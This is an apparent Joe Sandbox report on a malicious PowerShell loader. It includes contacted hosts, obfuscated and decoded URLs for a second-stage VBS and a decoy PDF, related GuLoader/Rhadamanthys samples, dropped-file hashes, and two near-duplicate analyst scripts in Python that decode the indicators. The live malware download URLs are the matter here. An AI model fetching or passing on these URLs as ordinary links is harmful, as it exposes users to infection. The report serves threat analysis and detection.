https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p | 0% | Avira URL Cloud | safe
http://www.bluacmmaxxlasacmr.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe
https://go.microsoft.coB3 | 0% | Avira URL Cloud | safe
http://www.microsoft.coiY | 0% | Avira URL Cloud | safe

Note on the first two rows: these are the strings as they occur in the sample, with the letter e written as the token acm (the substitution is evident from the obfuscated/decoded pairs in this report; the decoding routine itself is not shown). Decoded, they are the two URLs the sample contacted, http://www.bluemaxxlaser.com/ms/ms.vbs and https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf. A "safe" verdict on a hostname that does not exist says nothing about the real host, and the remaining three rows are partial strings recovered from process memory, not URLs the sample requested.
Domains and IPs:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.100 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high

"Malicious: false" and "Reputation: high" are Joe Sandbox's domain reputation, not a verdict on this run's traffic: astenterprises.com.pk and www.bluemaxxlaser.com are the two hosts from which powershell.exe fetched content (behavior graph), so treat them and their IPs as IOCs regardless of reputation. The fastly.net, cqloud.com and lencr.org names are Windows update/CDN and Let's Encrypt certificate infrastructure.
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | | high
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | | high

These are the decoded forms of the two obfuscated strings in the sample: a VBS second stage fetched over plain HTTP and a PDF fetched over HTTPS, the latter consistent with the Acrobat.exe child of powershell.exe in the behavior graph (a decoy document shown to the victim).
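The decoding step behind the two contacted URLs, as an added analyst helper; this is not code from the sample, whose own decode routine the report does not show. It assumes the substitution the report's obfuscated/decoded URL pairs make evident (the letter e stored as the token acm), extracts the quoted http(s) strings from script text, reverses the substitution and checks each result against the URLs the sandbox saw contacted. The script text is constructed for the example; only its two quoted strings are taken from the report, and the token and regular expression are assumptions.

```python
import re
from urllib.parse import urlparse

# Token that stands in for the letter "e" in the sample's URL strings.
# Inferred from the obfuscated/decoded URL pairs in the report; the sample's
# own decode routine is not shown there, so treat the token as an assumption.
TOKEN = "acm"

# Constructed stand-in for the script body: only the two quoted strings are
# taken from the report, the surrounding PowerShell is illustrative.
SAMPLE_TEXT = r'''
$u1 = "http://www.bluacmmaxxlasacmr.com/ms/ms.vbs"
$u2 = "https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p"
'''

# http(s) strings up to the next whitespace, quote or angle bracket.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

# URLs the report lists as contacted by powershell.exe in this run.
CONTACTED = [
    "http://www.bluemaxxlaser.com/ms/ms.vbs",
    "https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf",
]


def decode(s: str, token: str = TOKEN) -> str:
    """Reverse the substitution: every occurrence of the token becomes "e".

    The mapping is lossy: if the real URL ever contained the literal token the
    decoder cannot tell, and a legitimate string that happens to contain the
    token is mangled, so callers should sanity-check the decoded host.
    """
    return s.replace(token, "e")


def decode_iocs(text: str, token: str = TOKEN) -> list:
    """Pull URL-shaped strings out of script text and decode each one.

    Returns one record per string: the obfuscated form, the decoded URL, its
    host and path, and how many substitutions were applied. Zero substitutions
    means the string was a plain URL, not an obfuscated one.
    """
    records = []
    for raw in URL_RE.findall(text):
        decoded = decode(raw, token)
        parts = urlparse(decoded)
        records.append({
            "obfuscated": raw,
            "decoded": decoded,
            "host": parts.hostname,
            "path": parts.path,
            "substitutions": raw.count(token),
        })
    return records


def matches_contacted(decoded: str, contacted: list) -> bool:
    """True if the decoded string is a prefix of a URL the sandbox saw contacted.

    Prefix rather than equality, because one string in the report is cut off
    at ".p" where the contacted URL ends in ".pdf".
    """
    return any(url.startswith(decoded) for url in contacted)


if __name__ == "__main__":
    for rec in decode_iocs(SAMPLE_TEXT):
        seen = matches_contacted(rec["decoded"], CONTACTED)
        print(f'{rec["host"]:28} {rec["substitutions"]:2} subst  contacted={seen}  {rec["decoded"]}')
```

Run against the constructed text, both strings decode to the hosts in the Contacted URLs table (2 and 8 substitutions respectively) and both match a contacted URL. Against a real script body, the substitution count is the useful signal: a candidate with zero substitutions is a plain string, and a decoded host that never appears in the sandbox's network log deserves a second look before it is published as an IOC.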
URLs recovered from process memory dumps and dropped files:

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/List | powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bluacmmaxxlasacmr.com/ms/ms.vbs | powershell.exe, 00000000.00000002.1685887513.000001CA5B342000.00000004.00000800.00020000.00000000.sdmp, H6epOhxoPY.ps1 | true | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000000.00000002.1685887513.000001CA5BD42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.coiY | powershell.exe, 00000000.00000002.1784369442.000001CA73230000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000008.00000002.2706498999.00000268AD400000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2/C: | svchost.exe, 00000008.00000003.1632205416.00000268AD210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr | false | | high
http://go.micros | powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod/C: | edb.log.8.dr | false | | high
http://astenterprises.com.pk | powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552470227.00000110733E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CBF9000.00000004.00000800.00020000.00000000.sdmp | false

Most of these rows are benign strings that PowerShell itself carries in memory (Pester, NuGet, contoso.com placeholders, aka.ms help links, truncated CRL and microsoft.com fragments). The rows that matter for this sample are the astenterprises.com.pk and bluacmmaxxlasacmr.com entries: the obfuscated ms.vbs string is the one row marked malicious and is sourced from the sample file itself, which confirms the obfuscated form is stored literally in the script.
                                                            high
                                                            https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.ppowershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.1685887513.000001CA5CC94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://go.microsoft.coB3powershell.exe, 00000000.00000002.1781902419.000001CA7318E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
IP             | Domain                | Country       | ASN   | ASN Name         | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore     | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | 3842  | RAMNODEUS        | false

IP
127.0.0.1
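The two strings flagged above, http://www.bluacmmaxxlasacmr.com/ms/ms.vbs and the astacmntacmrprisacms.com.pk URL, are the download locations as they sit in the script, while the DNS table shows the hosts actually resolved (www.bluemaxxlaser.com, astenterprises.com.pk). Comparing the pairs, every "acm" in the obfuscated form stands for the letter "e"; the script's own decoding routine is not shown in this report, so that mapping is an inference from the strings, not something the page confirms. The following Python is an added triage helper (not part of the report or of the sample) that applies the inferred substitution and accepts a decoded URL as an indicator only when its host matches a domain the sandbox saw contacted, so that a benign string that happens to contain the token is not mangled. The inputs are the strings and domains from the tables above; TOKEN and LETTER are the assumed mapping.

```python
"""Decode substitution-obfuscated URLs pulled from PowerShell process memory and
cross-reference them with the domains the sandbox actually resolved."""
from urllib.parse import urlsplit, unquote

# Constructed from the report's URL table: obfuscated strings found in the
# powershell.exe memory dumps next to their plaintext counterparts, plus one
# benign PowerShell help link that must survive untouched.
MEMORY_STRINGS = [
    "http://www.bluacmmaxxlasacmr.com/ms/ms.vbs",
    "https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p",
    "http://www.bluemaxxlaser.com",
    "https://www.astenterprises.com.pk",
    "https://aka.ms/pscore68",
]

# Domains from the report's IP / Domain table.
CONTACTED_DOMAINS = {"www.bluemaxxlaser.com", "astenterprises.com.pk"}

# Assumption: the script masks the letter 'e' with the token 'acm' and undoes
# the substitution at runtime. The mapping is inferred from the string pairs in
# the report; the script source itself is not shown there.
TOKEN, LETTER = "acm", "e"


def deobfuscate(s: str, token: str = TOKEN, letter: str = LETTER) -> str:
    """Reverse the single-token substitution."""
    return s.replace(token, letter)


def registered_host(url: str) -> str:
    """Host of a URL with a leading 'www.' stripped, so that
    www.example.com and example.com compare equal."""
    host = urlsplit(url).hostname or ""
    return host[4:] if host.startswith("www.") else host


def recover_iocs(strings, contacted, token=TOKEN, letter=LETTER):
    """Decode each string and keep the decoded form only when its host matches
    a domain the sandbox saw contacted; otherwise keep the string as found.
    Returns a list of (original, decoded_or_original, confirmed) tuples."""
    contacted_hosts = {h[4:] if h.startswith("www.") else h for h in contacted}
    results = []
    for s in strings:
        decoded = deobfuscate(s, token, letter)
        confirmed = registered_host(decoded) in contacted_hosts
        # A string without the token decodes to itself; it still counts as an
        # IOC only if its host is in the contacted set.
        results.append((s, decoded if confirmed else s, confirmed))
    return results


def decoded_paths(results):
    """Percent-decoded paths of the confirmed IOCs (the files the loader fetches),
    ignoring bare hostnames."""
    paths = set()
    for _, url, confirmed in results:
        path = urlsplit(url).path
        if confirmed and path not in ("", "/"):
            paths.add(unquote(path))
    return sorted(paths)


if __name__ == "__main__":
    found = recover_iocs(MEMORY_STRINGS, CONTACTED_DOMAINS)
    for original, decoded, confirmed in found:
        marker = "IOC " if confirmed else "    "
        arrow = f"  ->  {decoded}" if decoded != original else ""
        print(f"{marker}{original}{arrow}")
    print("Fetched paths:", decoded_paths(found))
```

The confirmation step is the important part: a plain `.replace("acm", "e")` over every string in a memory dump would also rewrite any legitimate host containing the token, so the decoded form is only trusted when the network evidence backs it up.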
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1578230
                                                                        Start date and time:2024-12-19 12:49:29 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 43s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:H6epOhxoPY.ps1
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6.ps1
                                                                        Detection:MAL
                                                                        Classification:mal84.evad.winPS1@20/59@5/3
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 8
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 217.20.58.100, 162.159.61.3, 172.64.41.3, 23.218.208.137, 23.218.208.109, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 23.195.61.56, 2.19.198.27, 23.32.239.56, 20.12.23.50, 34.237.241.83, 23.47.168.24, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3284 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5708 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time     | Type            | Description
06:50:30 | API Interceptor | 69x Sleep call for process: powershell.exe modified
06:50:45 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:50:56 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
Context: IPs
Match / Associated Sample Name / Detection / Threat Name / Context
203.175.174.69
  KcKtHBkskI.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  1M1QoJF40r.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  8iAcoQLc3o.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  R7FBVcp1tf.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  2rTi9MgX25.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
  ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
  FjfZ7uM8zh.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  yswmdaREME.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
  0bNBLjPn56.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
107.161.23.150
  KcKtHBkskI.ps1 | malicious | Unknown
  1M1QoJF40r.ps1 | malicious | Unknown
  8iAcoQLc3o.ps1 | malicious | Unknown
  R7FBVcp1tf.ps1 | malicious | Unknown
  2rTi9MgX25.ps1 | malicious | Unknown
  tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS
  FjfZ7uM8zh.lnk | malicious | Unknown
  yswmdaREME.lnk | malicious | Unknown
  0bNBLjPn56.lnk | malicious | Unknown
  List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
Context: Domains
Match / Associated Sample Name / Detection / Threat Name / Context
bg.microsoft.map.fastly.net
  KcKtHBkskI.ps1 | malicious | Unknown | 199.232.214.172
  1M1QoJF40r.ps1 | malicious | Unknown | 199.232.210.172
  StGx54oFh6.exe | malicious | Quasar | 199.232.214.172
  8iAcoQLc3o.ps1 | malicious | Unknown | 199.232.214.172
  R7FBVcp1tf.ps1 | malicious | Unknown | 199.232.210.172
  2rTi9MgX25.ps1 | malicious | Unknown | 199.232.210.172
  LFLtlBAuf7.exe | malicious | Quasar | 199.232.210.172
  FjfZ7uM8zh.lnk | malicious | Unknown | 199.232.210.172
  yswmdaREME.lnk | malicious | Unknown | 199.232.214.172
  0bNBLjPn56.lnk | malicious | Unknown | 199.232.210.172
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
  KcKtHBkskI.ps1 | malicious | Unknown | 217.20.58.100
  1M1QoJF40r.ps1 | malicious | Unknown | 84.201.211.18
  v4BET4inNV.vbs | malicious | GuLoader | 217.20.58.101
  FjfZ7uM8zh.lnk | malicious | Unknown | 217.20.58.100
  t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS | 217.20.58.98
  update0.bat | malicious | Abobus Obfuscator | 217.20.58.100
  A file has been sent to you via DROPBOX.pdf | malicious | Unknown | 217.20.58.100
  VKJITO.exe | malicious | CobaltStrike, Metasploit | 212.229.88.4
  GV7DzNoqCI.exe | malicious | Unknown | 217.20.58.100
  99awhy8l.exe | malicious | LummaC | 217.20.58.100
Context: ASNs
Match / Associated Sample Name / Detection / Threat Name / Context
RAMNODEUS
  KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150
  1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150
  8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
  R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
  2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
  tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
  FjfZ7uM8zh.lnk | malicious | Unknown | 107.161.23.150
  yswmdaREME.lnk | malicious | Unknown | 107.161.23.150
  0bNBLjPn56.lnk | malicious | Unknown | 107.161.23.150
  List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
SGGS-AS-APSGGSSG
  KcKtHBkskI.ps1 | malicious | Unknown | 203.175.174.69
  1M1QoJF40r.ps1 | malicious | Unknown | 203.175.174.69
  8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69
  R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69
  2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69
  fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
  ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
  FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69
  yswmdaREME.lnk | malicious | Unknown | 203.175.174.69
  0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69
Context: JA3 Fingerprints
Match / Associated Sample Name / Detection / Threat Name / Context
3b5074b1b5d032e5620f69f9f700ff0e
  KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150
  1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150
  StGx54oFh6.exe | malicious | Quasar | 107.161.23.150
  8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
  R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
  2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
  fs8cRx6Us2.ps1 | malicious | Unknown | 107.161.23.150
  1AqzGcCKey.exe | malicious | Quasar | 107.161.23.150
  v4BET4inNV.vbs | malicious | GuLoader | 107.161.23.150
  ER4HMMzeQ3.ps1 | malicious | Unknown | 107.161.23.150
Context: Dropped Files
No context
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.8022051807135746
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAo:RJE+Lfki1GjHwU/+vVhWqpJ
                                                                                            MD5:CD011AB0550063CA2A56959724441941
                                                                                            SHA1:BE57C31D6827952B715B0AE161DDF7BD461B8485
                                                                                            SHA-256:B05E62B6DAF8F289E26E59E1667FCDC278977E0B310E5E1115F2E10100FF8FC1
                                                                                            SHA-512:DC4BF2C5241E10CC8ED9955858B941EED94A221D898F3A720F281C5913CF8BB9A3A3CEA2B2C3480BDFDF12436FEF9F43393D68FECA36C4720F13DEB97D362FF0
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x67e88cab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1048576
                                                                                            Entropy (8bit):0.9432711207507771
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:jSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:jazaHvxXy2V2UR
                                                                                            MD5:647555000703ED92AE28F858C9B091EA
                                                                                            SHA1:BCC4A6952DB2573084A53BF3D324D636CD00C672
                                                                                            SHA-256:5240D796CAE38B914F4D83F6470E64B291268FACCA20EA1BAC3BE3BA5870AC73
                                                                                            SHA-512:393CCD91C9E4CE03E2864E045B431FD001D9BBF92A7D2174294545662FCA8F9A99A746C84DE03ACF9215CEAE191FBA01D5354930FDA5CC5A91DD22170CE79CC6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:g.... ...............X\...;...{......................0.x...... ...{s..2...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...................................*.p.2...|w.................,2,b.2...|Y..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.080171769928628
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:C1KYe8JpZmql/nqlFcl1ZUllll/rJpyallGBnX/l/Tj/k7/t:C1KzopZNl/qlFclQ/lVD254
                                                                                            MD5:E2B1DA85425BDFCB424E444C30C812F7
                                                                                            SHA1:A5EF219A6091532D47B3971A9DAE28C2DE9C96DB
                                                                                            SHA-256:8DA9D9AD34BBFCE50A523C5B272FEBDD4558F903B5CC37119DC1A87DF8EA78DE
                                                                                            SHA-512:82BF841AC53F8E81F0ECC2DED1FED499F393B81E3ACD3F3A8D2058B519F4872737857C8CD5685F9D39263F450676F12F8D0797B3E8A0E5CA30C8BEBBA8E6C18E
                                                                                            Malicious:false
                                                                                            Preview:.aN......................................;...{...2...|Y.. ...{s.......... ...{s.. ...{s.P.... ...{s.................,2,b.2...|Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.206578480674279
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7YAVq2PCHhJ2nKuAl9OmbnIFUt8OKrAgZmw+OKrAIkwOCHhJ2nKuAl9OmbjLJ:7YAVvBHAahFUt8OSAg/+OSAI56HAaSJ
                                                                                            MD5:C60DD2DD06E3F848CF091A83BAB4ADA4
                                                                                            SHA1:FC4C99B959CA374F7A4F980C78F46DC8B742658A
                                                                                            SHA-256:881E03CEE04B5A739E308D8B5E530BDB28492D8FA518AA9F1153F4ED9533DC9A
                                                                                            SHA-512:2F12F42E35943D61DFBA2006B0AAB9D3B4CFF2569717165BF6F8DBF869A904EC56DFD4174996E18A519860C776EE17443B0C9C4C59980AAA6470647CA6323D5C
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:50:45.499 12b4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:50:45.501 12b4 Recovering log #3.2024/12/19-06:50:45.501 12b4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.206578480674279
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7YAVq2PCHhJ2nKuAl9OmbnIFUt8OKrAgZmw+OKrAIkwOCHhJ2nKuAl9OmbjLJ:7YAVvBHAahFUt8OSAg/+OSAI56HAaSJ
                                                                                            MD5:C60DD2DD06E3F848CF091A83BAB4ADA4
                                                                                            SHA1:FC4C99B959CA374F7A4F980C78F46DC8B742658A
                                                                                            SHA-256:881E03CEE04B5A739E308D8B5E530BDB28492D8FA518AA9F1153F4ED9533DC9A
                                                                                            SHA-512:2F12F42E35943D61DFBA2006B0AAB9D3B4CFF2569717165BF6F8DBF869A904EC56DFD4174996E18A519860C776EE17443B0C9C4C59980AAA6470647CA6323D5C
                                                                                            Malicious:false
